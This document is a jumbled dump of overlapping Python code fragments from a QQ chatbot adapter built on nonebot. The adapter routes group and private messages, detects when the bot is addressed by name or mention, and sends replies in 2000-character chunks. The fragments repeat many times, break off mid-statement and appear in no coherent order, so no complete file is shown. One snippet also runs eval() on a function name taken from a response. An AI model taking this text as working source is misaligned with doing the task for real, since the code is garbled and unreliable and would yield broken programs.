def", "text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text", "self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id", "import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False,", "@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter')", "TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) #", "# Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id =", "import image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST =", "execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot", "if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg = ''", "execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg):", "PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False,", "= str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in session.ctx['message']: if", "response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if", "def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response,", "from nonebot import on_natural_language, NLPSession, IntentCommand from 
....requests import Request from ....responses import", "IntentCommand from ....requests import Request from ....responses import * from ....distributor import Distributor", "in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id =", "= True for message in session.ctx['message']: if message['type'] == 'text' and request.msg is", "max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg", "这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]')", "'[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left", "def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list", "# msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await", "# 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg =", "text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)]", "logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request()", "if text != '': request.msg = text elif message['type'] == 'image' and request.img", "porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request", "request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names", "isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await 
session.send('【NonebotPorter】不支持的函数:%s'", "= {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share',", "= Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list", "elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id)", "= '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg):", "await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列", "continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img", "BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: #", "= text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo", "def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession):", "# msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await", "msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response,", "# 私聊时 bot_called = True for message in session.ctx['message']: if message['type'] == 'text'", "呼叫检测 for name in self_names: if name in text: # 被叫到时 bot_called =", "_(session: NLPSession): 
return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('===========", "import Request from ....responses import * from ....distributor import Distributor from ....utils import", "request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx',", "message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text: # 被叫到时", "elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await", "msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊", "logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async", "= message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud", "None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc =", "BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter',", "# request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None:", "message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in", "str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题", "else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 
logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called:", "isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\')", "\\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses():", "session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except", "需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else:", "msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) >", "CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request =", "session.ctx['message']: if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() #", "== name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for", "!= '': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response,", "name: text = text[:-len(name)] for sign in [None, ',', ',', None]: text =", "= response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送", "符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot]", "==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id'", "str(session.ctx['group_id']) else: # 私聊时 
bot_called = True for message in session.ctx['message']: if message['type']", "'小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter", "私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '':", "while text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',', ',',", "message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type']", "sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用'", "['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id:", "in text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' %", "递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses())", "in text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)] ==", "text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',',", "= distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response in", "# 空文本检测 if text != '': request.msg = text elif message['type'] == 'image'", "True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor()", "response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg)", "ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id)", "await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': #", 
"image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'],", "'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif", "text = text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign)", "response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await", "= await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError:", "from ....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback #", "msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else:", "elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':',", "else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot]", "or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]'", "> 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if", "ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if", "IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot", "import * from 
....distributor import Distributor from ....utils import image_url_to_path from ....paths import", "==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id =", "async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 #", "is None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name", "# 用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if isinstance(response,", "ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg +=", "message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg =", "len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分", "NLPSession, IntentCommand from ....requests import Request from ....responses import * from ....distributor import", "nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ'", "nonebot import CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import", "if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg)", "message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for", "request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() #", "% response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else:", "request.msg is None: text = 
message['data']['text'].strip() # 呼叫检测 for name in self_names: if", "获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return", "':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc):", "= image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list:", "request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude':", "msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息", "float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True", "'新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue #", "True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '':", "header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data',", "if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True", "% text continue # 空文本检测 if text != '': request.msg = text elif", "= text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in [None,", "'林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot]", "text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name:", "# 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if 
msg_left !=", "nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter", "request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and", "= msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: #", "await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列", "except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except", "= message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text: #", "from ....requests import Request from ....responses import * from ....distributor import Distributor from", "if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list:", "[3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0,", "session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' %", "while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] #", "[] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text})", "# 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img =", 
"name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign", "= True text = text.strip() while text[:len(name)] == name: text = text[len(name):] while", "bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时", "f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if", "str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:]", "text = text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] ==", "= msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): #", "消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo = True request.msg", "# 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo = True", "await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs)", "[MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform", "session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg", "else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or", "@on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列", "os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 
'latitude':", "request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async", "if name in text: # 被叫到时 bot_called = True text = text.strip() while", "execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行", "return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered", "isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' %", "self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called =", "for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length =", "= False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False):", "'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo =", "....requests import Request from ....responses import * from ....distributor import Distributor from ....utils", "* from ....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS", "request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in session.ctx['message']:", "session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 
except:", "在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await", "import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = []", "',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ'", "'': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic):", "def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包", "# 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id'])", "and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue", "nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True", "execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('===========", "on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import * from ....distributor", "CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from", "% str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: #", "# 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] #", "elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot 
porter", "{'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']:", "SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) #", "message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg =", "porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id", "porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if", "in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\", "text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text:", "Request from ....responses import * from ....distributor import Distributor from ....utils import image_url_to_path", "if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测", "ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left", "bot_called = True text = text.strip() while text[:len(name)] == name: text = text[len(name):]", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot]", "in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip()", "text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text", "output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) 
except", "初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img,", "==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id,", "elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url']", "request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location':", "float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo", "await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]'", "in self_names: if name in text: # 被叫到时 bot_called = True text =", "elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices',", "async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session:", "if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys():", "= '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg =", "message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError:", "in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in", "[MultiBot] Left nonebot porter ==========') return 
if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called", "被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name: text =", "= text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name:", "['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:',", "+= '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0:", "'[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg)", "text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测", "# 呼叫检测 for name in self_names: if name in text: # 被叫到时 bot_called", "if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列", "'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for", "request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous',", "'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type']", "Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list =", "False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif", "None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in", "session.msg_text}) @on_command('porter') async def porter(session: CommandSession): 
logging.debug('=========== [MultiBot] Entered nonebot porter ==========') #", "True text = text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):]", "0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response,", "msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif", "self_names: if name in text: # 被叫到时 bot_called = True text = text.strip()", "被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: #", "is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc", "get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list #", "私聊时 bot_called = True for message in session.ctx['message']: if message['type'] == 'text' and", "isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg):", "in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message", "in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while", "header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for", "'' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): #", "in response_list: try: if isinstance(response, ResponseMsg) or 